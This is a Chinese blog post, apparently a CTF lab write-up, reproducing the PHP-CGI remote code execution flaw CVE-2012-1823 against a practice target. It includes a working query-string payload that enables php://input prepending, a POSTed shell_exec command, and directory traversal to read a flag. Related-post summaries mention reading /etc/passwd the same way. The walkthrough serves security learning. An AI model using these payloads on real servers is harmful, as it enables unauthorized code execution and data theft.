漏洞复现之CVE-2012-1823（PHP-CGI远程代码执行）

最新推荐文章于 2025-02-09 22:28:10 发布

R3de3m

最新推荐文章于 2025-02-09 22:28:10 发布

阅读量753

点赞数 5

文章标签：网络安全 python php

本文链接：https://blog.youkuaiyun.com/ASD830/article/details/139774557

版权

关于CGI知识点
CGI模式下的参数：

-c 指定php.ini文件的位置
-n 不要加载php.ini文件
-d 指定配置项
-b 启动fastcgi进程
-s 显示文件源码
-T 执行指定次该文件
-h和-？ 显示帮助

题目如下图，没有什么发现

目录扫描一下

dirsearch -u http://47.96.234.169:32349/

发现info.php，直接访问/info.php

可以发现其php版本为5.4.1，而且可以看到一个cve字样：cve20121823
参考博客[CVE-2012-1823（PHP-CGI远程代码执行）_cve20121823-优快云博客]
然后我们使用burp抓包，便于观察回显

首先我们使用-s命令查看一下源代码

可以准确得到源码<?php phpinfo();

接着我们使用-d 指定配置项，这里我们可以结合post请求执行命令

?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input #payload

<?php echo shell_exec('whoami');?>   #post请求内容

可以看到当前用户的名称为“www-data”
然后我们使用ls命令列一下目录

得到index.php和info.php，使用cat命令查看一下index.php

提示我们这里没什么东西，我们猜测flag可能在根目录下，目录穿越一下

ls ../../../

发现flag，查看即可得到flag{32a52c19-c1db-4479-ac54-ab59d8d45977}

cat ../../../flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

R3de3m

关注关注

5
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

（CVE-2012-1823）PHP-CGI远程代码执行漏洞

weixin_45253622的博客

05-20

1496

漏洞原理 php-cgi是一个类似于消息的“传递者”，它接收web容器收到的http数据包，并把里面的数据交给PHP解释器执行。 php-cgi有两个功能，一是提供cgi方式的交互，二是提供fastcgi方式的交互。 cgi方式：web容器接收到http数据包后，拿到用户请求的文件（cgi脚本），并fork除一个子进程（解释器）去执行这个文件，然后拿到执行结果，直接返回给用户，然后子进程结束，但是这个cgi模式不能接收同时接收大量的请求，因为创建进程的时候会消耗服务器资源，资源也不是无限的，所以有了

漏洞复现-PHP-CGI Windows平台远程代码执行漏洞（CVE-2024-4577）

玄道的网安博客

08-12

1752

语言在设计时忽略了Windows系统内部对字符编码转换的Best-Fit特性，当PHP运行在Window平台且使用了如繁体中文(代码页950)、简体中文(代码页936)和日文(代码页932)等语系时，威胁者可构造恶意请求绕过CVE-2012-1823的保护，通过参数注入等攻击在目标PHP服务器上远程执行代码。结合上面的特性，你可以通过传%ad来传入一个"-"，这样在-之后的部分就会成为php-cgi的参数。只有php-cgi.exe是granted的，我们把视角还是回到php-cgi上。

参与评论您还未登录，请先登录后发表或查看评论

CVE-2012-1823漏洞复现

qq_46804551的博客

05-27

636

前言这个漏洞简单来说，就是用户请求的querystring（querystring字面上的意思就是查询字符串，一般是对http请求所带的数据进行解析，这里也是指http请求中所带的数据）被作为了php-cgi的参数，最终导致了一系列结果。 CGI即通用网关接口(Common Gateway Interface)，它是一段程序, 通俗的讲CGI就象是一座桥，把网页和WEB服务器中的执行程序连接起来，它把HTML接收的指令传递给服务器的执行程序，再把服务器执行程序的结果返还给HTML页。复现在相应的漏洞环

PHP-CGI远程代码执行漏洞（CVE-2012-1823）

weixin_74149904的博客

10-21

1690

CVE-2012-1823就是存在于以cgi模式运行的php中，本质是用户请求的参数被作为了php-cgi的参数。PHP-CGI远程代码执行漏洞（CVE-2012-1823）分析。

CVE-2012-1823

最新发布

Dikesi的博客

02-09

1022

PHP-CGI远程代码执行漏洞

php cgi 执行,php cgi远程任意代码执行漏洞

weixin_39520353的博客

03-10

169

国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞：http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/粗看一下貌似没啥危害，因为php做了防范，在cgi这个sapi下是无法使用-r，-f等直接执行命令的参数的。只有少数几个参数可以使用，因此公告里也就给出了使用-s参数读取源文件的poc。另外关于RCE的PoC原文没有给...

（CVE-2012-1823）PHP-CGI远程代码执行漏洞（80端口）

m0_62670778的博客

05-12

863

php-cgi是一个类似于消息的“传递者”，它接收web容器收到的http数据包，并把里面的数据交给PHP解释器执行php-cgi有两个功能，一是提供cgi方式的交互，二是提供fastcgi方式的交互cgi方式：web容器接收到http数据包后，拿到用户请求的文件（cgi脚本），并fork除一个子进程（解释器）去执行这个文件，然后拿到执行结果，直接返回给用户，然后子进程结束，但是这个cgi模式不能接收同时接收大量的请求，因为创建进程的时候会消耗服务器资源，资源也不是无限的，所以有了fastcgi。

cve-2012-1823漏洞复现

m0_74402888的博客

04-28

830

CVE-2012-1823就是存在于以cgi模式运行的php中，本质是用户请求的参数被作为了php-cgi的参数。cgi：它是一种协议。通过cgi协议，web server可以将动态请求和相关参数发送给专门处理动态内容的应用程序。

PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)

weixin_45653478的博客

06-27

1193

CVE-2024-4577是一个在Windows平台上运行的PHP CGI（Common Gateway Interface）的远程代码执行漏洞。该漏洞的存在主要是因为PHP在设计时未能预见到Windows系统的Best-Fit字符编码转换特性，导致攻击者可以通过构造特定的请求来绕过安全限制，从而在远程PHP服务器上执行任意代码。

【漏洞复现】CVE-2024-4577｜PHP CGI Windows平台远程代码执行漏洞

信安百科

06-09

1977

【漏洞复现】CVE-2024-4577｜PHP CGI Windows平台远程代码执行漏洞

CVE-2012-1823复现

hhiollk的博客

03-31

1131

PHP-CGI远程代码执行漏洞这个古老的漏洞，其实就是用户请求的querystring被作为了php-cgi的参数，命令行参数不仅可以通过 #!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi，还可以通过querystring的方式传入。影响版本 < php-5.3.12php < 5.4.2mod方式...

phpcgi 代码执行 (CVE-2012-1823) 复现

YouthBelief的博客

11-04

795

@[TOC](phpcgi 代码执行 (CVE-2012-1823)) phpcgi 代码执行 (CVE-2012-1823) 通过阅读源码，发现cgi模式下通过可控命令行参数有如下一些参数可用： -c 指定php.ini文件的位置 -n 不要加载php.ini文件 -d 指定配置项 -b 启动fastcgi进程 -s 显示文件源码 -T 执行指定次该文件 -h和-? 显示帮助访问下边页面返回源码说明存在该漏洞 ip:port/index.php/?-s 0x01 漏洞描述 CGI全称是“通用网关接

php-cgi漏洞,PHP-CGI远程代码执行漏洞（CVE-2012-1823）

weixin_36023909的博客

03-24

856

PHP-CGI远程代码执行漏洞(CVE-2012-1823)漏洞分析PHP SAPI 与运行模式在PHP源码中，有一个目录叫sapi。sapi在PHP中的作用，类似一个消息的“传递者”，(PHP-FPM中的fpm，其作用就是接受web容器通过fastcgi协议封装好的数据，交给PHP解释器执行；除了fpm，最常见的sapi应该是用于Apache的mod_php，这个sapi用于php和apache...

CVE-2012-1823 漏洞复现

Jay17的博客

02-10

1801

CVE-2012-1823 漏洞复现

[Vulfocus解题系列] phpcgi 代码执行 (CVE-2012-1823)

00勇士王子的博客

07-09

735

漏洞介绍名称: phpcgi 代码执行 (CVE-2012-1823) 描述: CGI全称是“通用网关接口”(Common Gateway Interface)，它可以让一个客户端，从网页浏览器向执行在Web服务器上的程序请求数据这个漏洞简单来说，就是用户请求的querystring（querystring字面上的意思就是查询字符串，一般是对http请求所带的数据进行解析，这里也是只http请求中所带的数据）被作为了php-cgi的参数，最终导致了一系列结果。解题过程 1.打开靶场环境 2.访问i

PHP-CGI远程任意代码执行漏洞(CVE-2012-1823)修复方案

weixin_34342905的博客

04-20

602

　　首先介绍一下这个漏洞，其实是在apache调用php解释器解释.php文件时，会将url参数传我给php解释器，如果在url后加传命令行开关（例如-s、-d 、-c或 -dauto_prepend_file%3d/etc/passwd+-n）等参数时，会导致源代码泄露和任意代码执行。　　这个漏洞影响php-5.3.12以前的版本，mod方式、fpm方式不受影响。　　既然...